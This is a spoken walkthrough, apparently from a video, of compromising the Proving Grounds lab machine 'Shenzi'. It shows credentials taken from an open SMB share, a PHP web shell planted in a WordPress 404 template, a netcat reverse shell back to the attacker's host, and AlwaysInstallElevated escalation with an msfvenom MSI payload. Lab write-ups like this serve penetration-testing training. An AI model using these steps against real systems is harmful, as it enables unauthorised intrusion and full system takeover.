How's it going, guys? Today we're going to be going over Shenzi from Proving Grounds. So as you can see, we have port 21 open, 80, SMB 443. We have MySQL open, but we need credentials. So let's check if we have anonymous FTP login, but from the in-map scan it looks like we don't. But let's go ahead and try it manually. Login failed. Alright, so let's move on to SMB. Let's try SMB client -l shenzi.pg. And without any credentials, it looks like there's a Shenzi share. So let's go ahead and try to connect to that. And it looks like we have some files within this directory, and we have anonymous login to this SMB share. So let's go ahead and download all these files. I'm gonna change my directory really quick. Now we're gonna do prompt off recurse on mget star exit. Let's look at this passwords.txt file. And within this passwords.txt file, we see a admin password for WordPress, and we also see some passwords for WebDav and none for MySQL. So since we have a password, let's go ahead and move on to the web port, which is port 80, and see if we see WordPress. Got a PHP info page. On this page we will see Shenzi a lot, so that's one hint. Another hint is the share name, which is Shenzi. But even if we do a bunch of directory fuzzing, we will never find the directory, the Shenzi directory, in any of the word lists that we need. So let's go to seclists, and I'm gonna use grep to grep out any strings that contain the word Shenzi. And as you can see, most of these word lists are in the passwords word list, and then there's one in discovery, which is discovery DNS JSON Haddix as Shenzi, but it's you don't really use this normally to directory fuzz for directories. So even if we use raf big.txt, raf small.txt directories and files in words, you would have never found Shenzi. So we can go over here and put Shenzi. Alright, so it takes us to this page. Scrolling down in meta, let's see if we can log in. Let's see if this is a dead link. No, it looks like we have access to a WordPress page. So let's go back to that file, copy this password, paste it in. Let's see if it works. And it looks like we have admin access to this WordPress page. Alright, now let's navigate to appearance. Now we go to theme editor. Now we're going to look for the 404 template. And when I tried this on my own, I was having trouble with the 2020 theme. So let's change it to 2017. I used this one right here from C#. So it takes input from the URL parameter show.php, and then we're going to navigate to show.php $CMD equals, and then we put the command at the end. So let's go ahead and copy this and go back to the WordPress page. Now we're going to press enter and paste in that code, and now we're going to press update file. Alright, so if you get this error message, unable to communicate back with the site to check for fatal errors, when you select 2017, you need to press select and press leave page, and now it updates it. So now you go to 404 template, and now we come here and paste in our PHP shell, press update, and file edited successfully. Now we need to navigate to the content page, things, and then we select the 2017 404.php. Now the question mark cmd equals format. And at the top it says we are shenzi. Now we need to figure out how can we get a shell from using this web shell. So what we can do is use netcat directly from our Windows machine. Our Kali machine. So we need to go to, alright, so I have netcat in this directory, so I'm going to start a SMB share here. And my SMB share name is hacks. Now we're going to go back to the web port, and we're going to do cmd.exe/c. And now we need our ton0 address. So my address is 192.168.45.230. And put in our share name, netcat64.exe -e cmd.exe, and then we put our ton0 address once again, and let's use port 443 since it's open. RL wrap 443 to set up our listener. So pretty much we are calling a file from our Kali Linux machine, and we are using that netcat64.exe file to get a reverse shell. Let's see if it works. And we have a shell. Who am I? We are shenzi on my/all. We have SE shutdown privilege. So when we have SE shutdown privilege, that tells us that there's a possibility that there's some type of service that we can rewrite and then restart the machine. Alright, so let's go to the C directory, look for any non-default shares. So one that sticks out is shenzi, but that might be how we got the actual shell. We can also go to users to see if there is any other users here. tree/a/f, and I don't see anything that sticks out besides the local.txt file, which is in a desktop directory. There's only shenzi in the administrator. So let's go back to C. Let's make a temp directory, cd temp. And now let's copy over our privs scripts. We need to start a Python 3 server because I'm using Burp Suite. Alright, now let's run PowerShell and run privs check.ps1 PowerShell-EP bypass. You can find this command on the privs check GitHub page. So the scan is finished, and we see this privilege escalation always install elevated. So let's go to that section. Let's do Shift Control F. And we can see it's a high severity. This always install elevated registry is set to 1. So we need to figure out how can we exploit this always install elevated vulnerability or misconfiguration. And just by Googling it, this is one of the first results that showed up. And one of the options that we have is creating a MSI file with MSF Venom. we run the following commands in order to install the MSI file on the system, and we set up our netcat listener in order to get a reverse show. And we're going to put our output equals 21. We're going to use 21 since it's open. -a x64 -- platform Windows -f MSI -o evil.msi. With the -a flag, we are setting the architecture, and --platform, we're setting the platform to a Windows system. Now we need to set up a Python server and copy over these files, or copy over the evil.msi file. It was successfully copied over. Now we do msi exec /i evil.msi. Forgot to set up my listener. rep 21. Okay, so I reset the machine and I set up my netcat listener. I repeated all the steps and I got a shell back, and I am NT Authority system now. Thanks for watching.